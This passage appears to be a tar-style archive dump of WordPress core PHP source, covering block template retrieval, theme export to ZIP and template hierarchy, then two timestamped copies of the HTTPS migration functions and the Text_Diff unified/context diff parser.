'terms' => get_stylesheet(),
),
),
);
if ( 'wp_template_part' === $template_type && isset( $query['area'] ) ) {
$wp_query_args['tax_query'][] = array(
'taxonomy' => 'wp_template_part_area',
'field' => 'name',
'terms' => $query['area'],
);
$wp_query_args['tax_query']['relation'] = 'AND';
}
if ( ! empty( $query['slug__in'] ) ) {
$wp_query_args['post_name__in'] = $query['slug__in'];
$wp_query_args['posts_per_page'] = count( array_unique( $query['slug__in'] ) );
}
// This is only needed for the regular templates/template parts post type listing and editor.
if ( isset( $query['wp_id'] ) ) {
$wp_query_args['p'] = $query['wp_id'];
} else {
$wp_query_args['post_status'] = 'publish';
}
$template_query = new WP_Query( $wp_query_args );
$query_result = array();
foreach ( $template_query->posts as $post ) {
$template = _build_block_template_result_from_post( $post );
if ( is_wp_error( $template ) ) {
continue;
}
if ( $post_type && ! $template->is_custom ) {
continue;
}
if (
$post_type &&
isset( $template->post_types ) &&
! in_array( $post_type, $template->post_types, true )
) {
continue;
}
$query_result[] = $template;
}
if ( ! isset( $query['wp_id'] ) ) {
/*
* If the query has found some user templates, those have priority
* over the theme-provided ones, so we skip querying and building them.
*/
$query['slug__not_in'] = wp_list_pluck( $query_result, 'slug' );
/*
* We need to unset the post_type query param because some templates
* would be excluded otherwise, like `page.html` when looking for
* `page` templates. We need all templates so we can exclude duplicates
* from plugin-registered templates.
* See: https://github.com/WordPress/gutenberg/issues/65584
*/
$template_files_query = $query;
unset( $template_files_query['post_type'] );
$template_files = _get_block_templates_files( $template_type, $template_files_query );
foreach ( $template_files as $template_file ) {
// If the query doesn't specify a post type, or it does and the template matches the post type, add it.
if (
! isset( $query['post_type'] ) ||
(
isset( $template_file['postTypes'] ) &&
in_array( $query['post_type'], $template_file['postTypes'], true )
)
) {
$query_result[] = _build_block_template_result_from_file( $template_file, $template_type );
} elseif ( ! isset( $template_file['postTypes'] ) ) {
// The custom templates with no associated post types are available for all post types as long
// as they are not default templates.
$candidate = _build_block_template_result_from_file( $template_file, $template_type );
$default_template_types = get_default_block_template_types();
if ( ! isset( $default_template_types[ $candidate->slug ] ) ) {
$query_result[] = $candidate;
}
}
}
if ( 'wp_template' === $template_type ) {
// Add templates registered in the template registry. Filtering out the ones which have a theme file.
$registered_templates = WP_Block_Templates_Registry::get_instance()->get_by_query( $query );
$matching_registered_templates = array_filter(
$registered_templates,
function ( $registered_template ) use ( $template_files ) {
foreach ( $template_files as $template_file ) {
if ( $template_file['slug'] === $registered_template->slug ) {
return false;
}
}
return true;
}
);
$matching_registered_templates = array_map(
function ( $template ) {
$template->content = apply_block_hooks_to_content(
$template->content,
$template,
'insert_hooked_blocks_and_set_ignored_hooked_blocks_metadata'
);
return $template;
},
$matching_registered_templates
);
$query_result = array_merge( $query_result, $matching_registered_templates );
}
}
/**
* Filters the array of queried block templates array after they've been fetched.
*
* @since 5.9.0
*
* @param WP_Block_Template[] $query_result Array of found block templates.
* @param array $query {
* Arguments to retrieve templates. All arguments are optional.
*
* @type string[] $slug__in List of slugs to include.
* @type int $wp_id Post ID of customized template.
* @type string $area A 'wp_template_part_area' taxonomy value to filter by (for 'wp_template_part' template type only).
* @type string $post_type Post type to get the templates for.
* }
* @param string $template_type wp_template or wp_template_part.
*/
return apply_filters( 'get_block_templates', $query_result, $query, $template_type );
}
/**
* Retrieves a single unified template object using its id.
*
* @since 5.8.0
*
* @param string $id Template unique identifier (example: 'theme_slug//template_slug').
* @param string $template_type Optional. Template type. Either 'wp_template' or 'wp_template_part'.
* Default 'wp_template'.
* @return WP_Block_Template|null Template.
*/
function get_block_template( $id, $template_type = 'wp_template' ) {
/**
* Filters the block template object before the query takes place.
*
* Return a non-null value to bypass the WordPress queries.
*
* @since 5.9.0
*
* @param WP_Block_Template|null $block_template Return block template object to short-circuit the default query,
* or null to allow WP to run its normal queries.
* @param string $id Template unique identifier (example: 'theme_slug//template_slug').
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
*/
$block_template = apply_filters( 'pre_get_block_template', null, $id, $template_type );
if ( ! is_null( $block_template ) ) {
return $block_template;
}
$parts = explode( '//', $id, 2 );
if ( count( $parts ) < 2 ) {
return null;
}
list( $theme, $slug ) = $parts;
$wp_query_args = array(
'post_name__in' => array( $slug ),
'post_type' => $template_type,
'post_status' => array( 'auto-draft', 'draft', 'publish', 'trash' ),
'posts_per_page' => 1,
'no_found_rows' => true,
'tax_query' => array(
array(
'taxonomy' => 'wp_theme',
'field' => 'name',
'terms' => $theme,
),
),
);
$template_query = new WP_Query( $wp_query_args );
$posts = $template_query->posts;
if ( count( $posts ) > 0 ) {
$template = _build_block_template_result_from_post( $posts[0] );
if ( ! is_wp_error( $template ) ) {
return $template;
}
}
$block_template = get_block_file_template( $id, $template_type );
/**
* Filters the queried block template object after it's been fetched.
*
* @since 5.9.0
*
* @param WP_Block_Template|null $block_template The found block template, or null if there isn't one.
* @param string $id Template unique identifier (example: 'theme_slug//template_slug').
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
*/
return apply_filters( 'get_block_template', $block_template, $id, $template_type );
}
/**
* Retrieves a unified template object based on a theme file or plugin registration.
*
* This is a fallback of get_block_template(), used when no templates are found in the database.
* Also checks for templates registered via the Template Registration API.
*
* @since 5.9.0
*
* @param string $id Template unique identifier (example: 'theme_slug//template_slug').
* @param string $template_type Optional. Template type. Either 'wp_template' or 'wp_template_part'.
* Default 'wp_template'.
* @return WP_Block_Template|null The found block template, or null if there isn't one.
*/
function get_block_file_template( $id, $template_type = 'wp_template' ) {
/**
* Filters the block template object before the theme file discovery takes place.
*
* Return a non-null value to bypass the WordPress theme file discovery.
*
* @since 5.9.0
*
* @param WP_Block_Template|null $block_template Return block template object to short-circuit the default query,
* or null to allow WP to run its normal queries.
* @param string $id Template unique identifier (example: 'theme_slug//template_slug').
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
*/
$block_template = apply_filters( 'pre_get_block_file_template', null, $id, $template_type );
if ( ! is_null( $block_template ) ) {
return $block_template;
}
$parts = explode( '//', $id, 2 );
if ( count( $parts ) < 2 ) {
/** This filter is documented in wp-includes/block-template-utils.php */
return apply_filters( 'get_block_file_template', null, $id, $template_type );
}
list( $theme, $slug ) = $parts;
if ( get_stylesheet() === $theme ) {
$template_file = _get_block_template_file( $template_type, $slug );
if ( null !== $template_file ) {
$block_template = _build_block_template_result_from_file( $template_file, $template_type );
/** This filter is documented in wp-includes/block-template-utils.php */
return apply_filters( 'get_block_file_template', $block_template, $id, $template_type );
}
}
$block_template = WP_Block_Templates_Registry::get_instance()->get_by_slug( $slug );
if ( $block_template ) {
$block_template->content = apply_block_hooks_to_content(
$block_template->content,
$block_template,
'insert_hooked_blocks_and_set_ignored_hooked_blocks_metadata'
);
}
/**
* Filters the block template object after it has been (potentially) fetched from the theme file.
*
* @since 5.9.0
*
* @param WP_Block_Template|null $block_template The found block template, or null if there is none.
* @param string $id Template unique identifier (example: 'theme_slug//template_slug').
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
*/
return apply_filters( 'get_block_file_template', $block_template, $id, $template_type );
}
/**
* Prints a block template part.
*
* @since 5.9.0
*
* @param string $part The block template part to print, for example 'header' or 'footer'.
*/
function block_template_part( $part ) {
$template_part = get_block_template( get_stylesheet() . '//' . $part, 'wp_template_part' );
if ( ! $template_part || empty( $template_part->content ) ) {
return;
}
echo do_blocks( $template_part->content );
}
/**
* Prints the header block template part.
*
* @since 5.9.0
*/
function block_header_area() {
block_template_part( 'header' );
}
/**
* Prints the footer block template part.
*
* @since 5.9.0
*/
function block_footer_area() {
block_template_part( 'footer' );
}
/**
* Determines whether a theme directory should be ignored during export.
*
* @since 6.0.0
*
* @param string $path The path of the file in the theme.
* @return bool Whether this file is in an ignored directory.
*/
function wp_is_theme_directory_ignored( $path ) {
$directories_to_ignore = array( '.DS_Store', '.svn', '.git', '.hg', '.bzr', 'node_modules', 'vendor' );
foreach ( $directories_to_ignore as $directory ) {
if ( str_starts_with( $path, $directory ) ) {
return true;
}
}
return false;
}
/**
* Creates an export of the current templates and
* template parts from the site editor at the
* specified path in a ZIP file.
*
* @since 5.9.0
* @since 6.0.0 Adds the whole theme to the export archive.
*
* @return WP_Error|string Path of the ZIP file or error on failure.
*/
function wp_generate_block_templates_export_file() {
$wp_version = wp_get_wp_version();
if ( ! class_exists( 'ZipArchive' ) ) {
return new WP_Error( 'missing_zip_package', __( 'Zip Export not supported.' ) );
}
$obscura = wp_generate_password( 12, false, false );
$theme_name = basename( get_stylesheet() );
$filename = get_temp_dir() . $theme_name . $obscura . '.zip';
$zip = new ZipArchive();
if ( true !== $zip->open( $filename, ZipArchive::CREATE | ZipArchive::OVERWRITE ) ) {
return new WP_Error( 'unable_to_create_zip', __( 'Unable to open export file (archive) for writing.' ) );
}
$zip->addEmptyDir( 'templates' );
$zip->addEmptyDir( 'parts' );
// Get path of the theme.
$theme_path = wp_normalize_path( get_stylesheet_directory() );
// Create recursive directory iterator.
$theme_files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator( $theme_path ),
RecursiveIteratorIterator::LEAVES_ONLY
);
// Make a copy of the current theme.
foreach ( $theme_files as $file ) {
// Skip directories as they are added automatically.
if ( ! $file->isDir() ) {
// Get real and relative path for current file.
$file_path = wp_normalize_path( $file );
$relative_path = substr( $file_path, strlen( $theme_path ) + 1 );
if ( ! wp_is_theme_directory_ignored( $relative_path ) ) {
$zip->addFile( $file_path, $relative_path );
}
}
}
// Load templates into the zip file.
$templates = get_block_templates();
foreach ( $templates as $template ) {
$template->content = traverse_and_serialize_blocks(
parse_blocks( $template->content ),
'_remove_theme_attribute_from_template_part_block'
);
$zip->addFromString(
'templates/' . $template->slug . '.html',
$template->content
);
}
// Load template parts into the zip file.
$template_parts = get_block_templates( array(), 'wp_template_part' );
foreach ( $template_parts as $template_part ) {
$zip->addFromString(
'parts/' . $template_part->slug . '.html',
$template_part->content
);
}
// Load theme.json into the zip file.
$tree = WP_Theme_JSON_Resolver::get_theme_data( array(), array( 'with_supports' => false ) );
// Merge with user data.
$tree->merge( WP_Theme_JSON_Resolver::get_user_data() );
$theme_json_raw = $tree->get_data();
// If a version is defined, add a schema.
if ( $theme_json_raw['version'] ) {
$theme_json_version = 'wp/' . substr( $wp_version, 0, 3 );
$schema = array( '$schema' => 'https://schemas.wp.org/' . $theme_json_version . '/theme.json' );
$theme_json_raw = array_merge( $schema, $theme_json_raw );
}
// Convert to a string.
$theme_json_encoded = wp_json_encode( $theme_json_raw, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE );
// Replace 4 spaces with a tab.
$theme_json_tabbed = preg_replace( '~(?:^|\G)\h{4}~m', "\t", $theme_json_encoded );
// Add the theme.json file to the zip.
$zip->addFromString(
'theme.json',
$theme_json_tabbed
);
// Save changes to the zip file.
$zip->close();
return $filename;
}
/**
* Gets the template hierarchy for the given template slug to be created.
*
* Note: Always add `index` as the last fallback template.
*
* @since 6.1.0
*
* @param string $slug The template slug to be created.
* @param bool $is_custom Optional. Indicates if a template is custom or
* part of the template hierarchy. Default false.
* @param string $template_prefix Optional. The template prefix for the created template.
* Used to extract the main template type, e.g.
* in `taxonomy-books` the `taxonomy` is extracted.
* Default empty string.
* @return string[] The template hierarchy.
*/
function get_template_hierarchy( $slug, $is_custom = false, $template_prefix = '' ) {
if ( 'index' === $slug ) {
/** This filter is documented in wp-includes/template.php */
return apply_filters( 'index_template_hierarchy', array( 'index' ) );
}
if ( $is_custom ) {
/** This filter is documented in wp-includes/template.php */
return apply_filters( 'page_template_hierarchy', array( 'page', 'singular', 'index' ) );
}
if ( 'front-page' === $slug ) {
/** This filter is documented in wp-includes/template.php */
return apply_filters( 'frontpage_template_hierarchy', array( 'front-page', 'home', 'index' ) );
}
$matches = array();
$template_hierarchy = array( $slug );
// Most default templates don't have `$template_prefix` assigned.
if ( ! empty( $template_prefix ) ) {
list( $type ) = explode( '-', $template_prefix );
// We need these checks because we always add the `$slug` above.
if ( ! in_array( $template_prefix, array( $slug, $type ), true ) ) {
$template_hierarchy[] = $template_prefix;
}
if ( $slug !== $type ) {
$template_hierarchy[] = $type;
}
} elseif ( preg_match( '/^(author|category|archive|tag|page)-.+$/', $slug, $matches ) ) {
$template_hierarchy[] = $matches[1];
} elseif ( preg_match( '/^(taxonomy|single)-(.+)$/', $slug, $matches ) ) {
$type = $matches[1];
$slug_remaining = $matches[2];
$items = 'single' === $type ? get_post_types() : get_taxonomies();
foreach ( $items as $item ) {
if ( ! str_starts_with( $slug_remaining, $item ) ) {
continue;
}
// If $slug_remaining is equal to $post_type or $taxonomy we have
// the single-$post_type template or the taxonomy-$taxonomy template.
if ( $slug_remaining === $item ) {
$template_hierarchy[] = $type;
break;
}
// If $slug_remaining is single-$post_type-$slug template.
if ( strlen( $slug_remaining ) > strlen( $item ) + 1 ) {
$template_hierarchy[] = "$type-$item";
$template_hierarchy[] = $type;
break;
}
}
}
// Handle `archive` template.
if (
str_starts_with( $slug, 'author' ) ||
str_starts_with( $slug, 'taxonomy' ) ||
str_starts_with( $slug, 'category' ) ||
str_starts_with( $slug, 'tag' ) ||
'date' === $slug
) {
$template_hierarchy[] = 'archive';
}
// Handle `single` template.
if ( 'attachment' === $slug ) {
$template_hierarchy[] = 'single';
}
// Handle `singular` template.
if (
str_starts_with( $slug, 'single' ) ||
str_starts_with( $slug, 'page' ) ||
'attachment' === $slug
) {
$template_hierarchy[] = 'singular';
}
$template_hierarchy[] = 'index';
$template_type = '';
if ( ! empty( $template_prefix ) ) {
list( $template_type ) = explode( '-', $template_prefix );
} else {
list( $template_type ) = explode( '-', $slug );
}
$valid_template_types = array( '404', 'archive', 'attachment', 'author', 'category', 'date', 'embed', 'frontpage', 'home', 'index', 'page', 'paged', 'privacypolicy', 'search', 'single', 'singular', 'tag', 'taxonomy' );
if ( in_array( $template_type, $valid_template_types, true ) ) {
/** This filter is documented in wp-includes/template.php */
return apply_filters( "{$template_type}_template_hierarchy", $template_hierarchy );
}
return $template_hierarchy;
}
/**
* Inject ignoredHookedBlocks metadata attributes into a template or template part.
*
* Given an object that represents a `wp_template` or `wp_template_part` post object
* prepared for inserting or updating the database, locate all blocks that have
* hooked blocks, and inject a `metadata.ignoredHookedBlocks` attribute into the anchor
* blocks to reflect the latter.
*
* @since 6.5.0
* @access private
*
* @param stdClass $changes An object representing a template or template part
* prepared for inserting or updating the database.
* @param WP_REST_Request $deprecated Deprecated. Not used.
* @return stdClass|WP_Error The updated object representing a template or template part.
*/
function inject_ignored_hooked_blocks_metadata_attributes( $changes, $deprecated = null ) {
if ( null !== $deprecated ) {
_deprecated_argument( __FUNCTION__, '6.5.3' );
}
if ( ! isset( $changes->post_content ) ) {
return $changes;
}
$hooked_blocks = get_hooked_blocks();
if ( empty( $hooked_blocks ) && ! has_filter( 'hooked_block_types' ) ) {
return $changes;
}
$meta = isset( $changes->meta_input ) ? $changes->meta_input : array();
$terms = isset( $changes->tax_input ) ? $changes->tax_input : array();
if ( empty( $changes->ID ) ) {
// There's no post object for this template in the database for this template yet.
$post = $changes;
} else {
// Find the existing post object.
$post = get_post( $changes->ID );
// If the post is a revision, use the parent post's post_name and post_type.
$post_id = wp_is_post_revision( $post );
if ( $post_id ) {
$parent_post = get_post( $post_id );
$post->post_name = $parent_post->post_name;
$post->post_type = $parent_post->post_type;
}
// Apply the changes to the existing post object.
$post = (object) array_merge( (array) $post, (array) $changes );
$type_terms = get_the_terms( $changes->ID, 'wp_theme' );
$terms['wp_theme'] = ! is_wp_error( $type_terms ) && ! empty( $type_terms ) ? $type_terms[0]->name : null;
}
// Required for the WP_Block_Template. Update the post object with the current time.
$post->post_modified = current_time( 'mysql' );
// If the post_author is empty, set it to the current user.
if ( empty( $post->post_author ) ) {
$post->post_author = get_current_user_id();
}
if ( 'wp_template_part' === $post->post_type && ! isset( $terms['wp_template_part_area'] ) ) {
$area_terms = get_the_terms( $changes->ID, 'wp_template_part_area' );
$terms['wp_template_part_area'] = ! is_wp_error( $area_terms ) && ! empty( $area_terms ) ? $area_terms[0]->name : null;
}
$template = _build_block_template_object_from_post_object( new WP_Post( $post ), $terms, $meta );
if ( is_wp_error( $template ) ) {
return $template;
}
if ( 'wp_template_part' === $post->post_type ) {
$attributes = array();
$existing_ignored_hooked_blocks = isset( $post->ID ) ? get_post_meta( $post->ID, '_wp_ignored_hooked_blocks', true ) : '';
if ( ! empty( $existing_ignored_hooked_blocks ) ) {
$attributes['metadata'] = array(
'ignoredHookedBlocks' => json_decode( $existing_ignored_hooked_blocks, true ),
);
}
$content = get_comment_delimited_block_content(
'core/template-part',
$attributes,
$changes->post_content
);
$content = apply_block_hooks_to_content( $content, $template, 'set_ignored_hooked_blocks_metadata' );
$changes->post_content = remove_serialized_parent_block( $content );
$wrapper_block_markup = extract_serialized_parent_block( $content );
$wrapper_block = parse_blocks( $wrapper_block_markup )[0];
$ignored_hooked_blocks = $wrapper_block['attrs']['metadata']['ignoredHookedBlocks'] ?? array();
if ( ! empty( $ignored_hooked_blocks ) ) {
if ( ! isset( $changes->meta_input ) ) {
$changes->meta_input = array();
}
$changes->meta_input['_wp_ignored_hooked_blocks'] = wp_json_encode( $ignored_hooked_blocks );
}
} else {
$changes->post_content = apply_block_hooks_to_content( $changes->post_content, $template, 'set_ignored_hooked_blocks_metadata' );
}
return $changes;
}
https-migration-20260606010046.php 0000666 00000011205 15224151220 0011761 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
string.php 0000666 00000020233 15224151220 0006561 0 ustar 00 <?php
/**
* Parses unified or context diffs output from eg. the diff utility.
*
* Example:
* <code>
* $patch = file_get_contents('example.patch');
* $diff = new Text_Diff('string', array($patch));
* $renderer = new Text_Diff_Renderer_inline();
* echo $renderer->render($diff);
* </code>
*
* Copyright 2005 Örjan Persson <o@42mm.org>
* Copyright 2005-2010 The Horde Project (http://www.horde.org/)
*
* See the enclosed file COPYING for license information (LGPL). If you did
* not receive this file, see https://opensource.org/license/lgpl-2-1/.
*
* @author Örjan Persson <o@42mm.org>
* @package Text_Diff
* @since 0.2.0
*/
class Text_Diff_Engine_string {
/**
* Parses a unified or context diff.
*
* First param contains the whole diff and the second can be used to force
* a specific diff type. If the second parameter is 'autodetect', the
* diff will be examined to find out which type of diff this is.
*
* @param string $diff The diff content.
* @param string $mode The diff mode of the content in $diff. One of
* 'context', 'unified', or 'autodetect'.
*
* @return array List of all diff operations.
*/
function diff($diff, $mode = 'autodetect')
{
// Detect line breaks.
$lnbr = "\n";
if (strpos($diff, "\r\n") !== false) {
$lnbr = "\r\n";
} elseif (strpos($diff, "\r") !== false) {
$lnbr = "\r";
}
// Make sure we have a line break at the EOF.
if (substr($diff, -strlen($lnbr)) != $lnbr) {
$diff .= $lnbr;
}
if ($mode != 'autodetect' && $mode != 'context' && $mode != 'unified') {
return PEAR::raiseError('Type of diff is unsupported');
}
if ($mode == 'autodetect') {
$context = strpos($diff, '***');
$unified = strpos($diff, '---');
if ($context === $unified) {
return PEAR::raiseError('Type of diff could not be detected');
} elseif ($context === false || $unified === false) {
$mode = $context !== false ? 'context' : 'unified';
} else {
$mode = $context < $unified ? 'context' : 'unified';
}
}
// Split by new line and remove the diff header, if there is one.
$diff = explode($lnbr, $diff);
if (($mode == 'context' && strpos($diff[0], '***') === 0) ||
($mode == 'unified' && strpos($diff[0], '---') === 0)) {
array_shift($diff);
array_shift($diff);
}
if ($mode == 'context') {
return $this->parseContextDiff($diff);
} else {
return $this->parseUnifiedDiff($diff);
}
}
/**
* Parses an array containing the unified diff.
*
* @param array $diff Array of lines.
*
* @return array List of all diff operations.
*/
function parseUnifiedDiff($diff)
{
$edits = array();
$end = count($diff) - 1;
for ($i = 0; $i < $end;) {
$diff1 = array();
switch (substr($diff[$i], 0, 1)) {
case ' ':
do {
$diff1[] = substr($diff[$i], 1);
} while (++$i < $end && substr($diff[$i], 0, 1) == ' ');
$edits[] = new Text_Diff_Op_copy($diff1);
break;
case '+':
// get all new lines
do {
$diff1[] = substr($diff[$i], 1);
} while (++$i < $end && substr($diff[$i], 0, 1) == '+');
$edits[] = new Text_Diff_Op_add($diff1);
break;
case '-':
// get changed or removed lines
$diff2 = array();
do {
$diff1[] = substr($diff[$i], 1);
} while (++$i < $end && substr($diff[$i], 0, 1) == '-');
while ($i < $end && substr($diff[$i], 0, 1) == '+') {
$diff2[] = substr($diff[$i++], 1);
}
if (count($diff2) == 0) {
$edits[] = new Text_Diff_Op_delete($diff1);
} else {
$edits[] = new Text_Diff_Op_change($diff1, $diff2);
}
break;
default:
$i++;
break;
}
}
return $edits;
}
/**
* Parses an array containing the context diff.
*
* @param array $diff Array of lines.
*
* @return array List of all diff operations.
*/
function parseContextDiff(&$diff)
{
$edits = array();
$i = $max_i = $j = $max_j = 0;
$end = count($diff) - 1;
while ($i < $end && $j < $end) {
while ($i >= $max_i && $j >= $max_j) {
// Find the boundaries of the diff output of the two files
for ($i = $j;
$i < $end && substr($diff[$i], 0, 3) == '***';
$i++);
for ($max_i = $i;
$max_i < $end && substr($diff[$max_i], 0, 3) != '---';
$max_i++);
for ($j = $max_i;
$j < $end && substr($diff[$j], 0, 3) == '---';
$j++);
for ($max_j = $j;
$max_j < $end && substr($diff[$max_j], 0, 3) != '***';
$max_j++);
}
// find what hasn't been changed
$array = array();
while ($i < $max_i &&
$j < $max_j &&
strcmp($diff[$i], $diff[$j]) == 0) {
$array[] = substr($diff[$i], 2);
$i++;
$j++;
}
while ($i < $max_i && ($max_j-$j) <= 1) {
if ($diff[$i] != '' && substr($diff[$i], 0, 1) != ' ') {
break;
}
$array[] = substr($diff[$i++], 2);
}
while ($j < $max_j && ($max_i-$i) <= 1) {
if ($diff[$j] != '' && substr($diff[$j], 0, 1) != ' ') {
break;
}
$array[] = substr($diff[$j++], 2);
}
if (count($array) > 0) {
$edits[] = new Text_Diff_Op_copy($array);
}
if ($i < $max_i) {
$diff1 = array();
switch (substr($diff[$i], 0, 1)) {
case '!':
$diff2 = array();
do {
$diff1[] = substr($diff[$i], 2);
if ($j < $max_j && substr($diff[$j], 0, 1) == '!') {
$diff2[] = substr($diff[$j++], 2);
}
} while (++$i < $max_i && substr($diff[$i], 0, 1) == '!');
$edits[] = new Text_Diff_Op_change($diff1, $diff2);
break;
case '+':
do {
$diff1[] = substr($diff[$i], 2);
} while (++$i < $max_i && substr($diff[$i], 0, 1) == '+');
$edits[] = new Text_Diff_Op_add($diff1);
break;
case '-':
do {
$diff1[] = substr($diff[$i], 2);
} while (++$i < $max_i && substr($diff[$i], 0, 1) == '-');
$edits[] = new Text_Diff_Op_delete($diff1);
break;
}
}
if ($j < $max_j) {
$diff2 = array();
switch (substr($diff[$j], 0, 1)) {
case '+':
do {
$diff2[] = substr($diff[$j++], 2);
} while ($j < $max_j && substr($diff[$j], 0, 1) == '+');
$edits[] = new Text_Diff_Op_add($diff2);
break;
case '-':
do {
$diff2[] = substr($diff[$j++], 2);
} while ($j < $max_j && substr($diff[$j], 0, 1) == '-');
$edits[] = new Text_Diff_Op_delete($diff2);
break;
}
}
}
return $edits;
}
}
https-migration-20260605070331.php 0000666 00000011205 15224151220 0011763 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
